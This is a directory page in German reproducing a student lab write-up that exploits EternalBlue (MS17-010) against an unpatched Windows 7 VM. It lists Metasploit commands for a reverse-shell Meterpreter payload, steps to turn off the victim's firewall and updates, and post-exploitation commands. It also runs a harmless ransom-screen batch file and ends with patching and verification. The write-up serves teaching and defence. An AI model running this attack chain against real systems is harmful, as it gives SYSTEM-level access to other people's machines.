Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
EternalBlue-Exploit-Demonstration — Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment. | Kitploit
Tools/GitHubGitHub/dannic145/eternalblue-exploit-demonstration
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationPost-ExploitationMalware AnalysisCTFPenetration TestingLearning & Education

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Red Teaming
Labs & Practice
GitHubdannic145/eternalblue-exploit-demonstration

EternalBlue-Exploit-Demonstration

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Über

Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment.

Teilen

EternalBlue Exploit-Demonstration (MS17-010)

Cybersecurity-Labor, das die Ausnutzung von CVE-2017-0144 (EternalBlue) mittels Metasploit gegen ein verwundbares Windows 7-System demonstriert und SYSTEM-Ebene-Zugriff über Meterpreter erreicht.

Dieses Projekt simuliert außerdem einen Ransomware-Angriff im WannaCry-Stil (SICHERE DEMO) und zeigt die Schadensbegrenzung durch den MS17-010-Sicherheitspatch.


Modulinformationen

Modul: CSCM828 Sicherheitslücken und Penetrationstests

Studenten:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

Universität: Swansea University


Ressourcen & Downloads

  1. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 Sicherheitsupdate)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (Download virtueller Maschinen)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium Englisch x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro 17.6.4
    https://www.vmware.com/products/desktop-hyper


1. Übersicht

Dieses Labor demonstriert:

  • Fernausnutzung der SMB-Sicherheitslücke (MS17-010)
  • Zugriff auf Kernel-Ebene via EternalBlue
  • Aufbau einer Meterpreter-Sitzung
  • Post-Exploitation-Techniken
  • Ransomware-Simulation im WannaCry-Stil (sicher)
  • Schadensbegrenzung durch Patchen

2. Laborumgebung

Anforderungen

  • VMware Workstation / VirtualBox
  • Mindestens 8 GB RAM

Angreifer-Maschine

  • Kali Linux
  • Metasploit Framework

Opfer-Maschine

  • Windows 7 SP1 x64 (ungepatcht)

Netzwerk

  • Host-only / NAT (isolierte Umgebung)
  • Stellen Sie sicher, dass beide Maschinen kommunizieren können

⚠️ Dieses Labor muss in einer vollständig isolierten Umgebung durchgeführt werden.


3. Opfer-Einrichtung (Windows 7)

Führen Sie in der Administrator-Eingabeaufforderung aus:

Firewall deaktivieren

root@kitploit:~
netsh advfirewall set allprofiles state off

SMB-Port überprüfen

root@kitploit:~
netstat -an | findstr :445

Updates deaktivieren (für Laborstabilität)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. Angreifer-Einrichtung (Kali Linux)

Verbindung überprüfen

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. Exploit-Schritte

Schritt 1: Ziel scannen

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Erwartet:

  • Host is VULNERABLE

Schritt 2: Exploit ausführen

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Schritt 3: Zugriff bestätigen

root@kitploit:~
meterpreter > getuid

Erwartet:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. Post-Exploitation

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

Stabile Migration

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry-Simulation (SICHERE DEMO)

Payload erstellen (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

Hochladen und ausführen

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. Schadensbegrenzung (Patch-Demonstration)

Schritt 1: Patch herunterladen

  • Besuchen Sie: https://www.catalog.update.microsoft.com/
  • Suchen nach: KB4012212 Windows 7 x64
  • Laden Sie die .msu-Datei herunter

Schritt 2: Patch installieren

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

Schritt 3: Neustart

root@kitploit:~
shutdown /r /t 0

Schritt 4: Patch überprüfen

root@kitploit:~
systeminfo | findstr KB4012212

Schritt 5: Exploit erneut ausführen

Erwartet:

  • Exploit schlägt fehl
  • Keine Meterpreter-Sitzung

Schritt 6: Mit Nmap überprüfen

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

Erwartet:

  • NOT VULNERABLE

9. Fehlerbehebung

ProblemLösung
Exploit schlägt fehlVerbindung prüfen
Keine SitzungFirewall deaktivieren
Sitzung stirbtExploit erneut versuchen
Kein sichtbares FensterZu explorer.exe migrieren

10. Ethische Überlegungen

Dieses Projekt wird durchgeführt:

  • Nur auf kontrollierten Labormaschinen
  • In einem vollständig isolierten Netzwerk
  • Nur zu Bildungszwecken

Unbefugte Nutzung verstößt gegen:

  • UK Computer Misuse Act 1990

11. Fazit

Dieses Labor demonstriert:

  • Reale SMB-Ausnutzung mittels EternalBlue
  • SYSTEM-Ebene-Kompromittierung von Windows 7
  • Ransomware-Angriffssimulation (sicher)
  • Bedeutung rechtzeitiger Patches
Tool herunterladen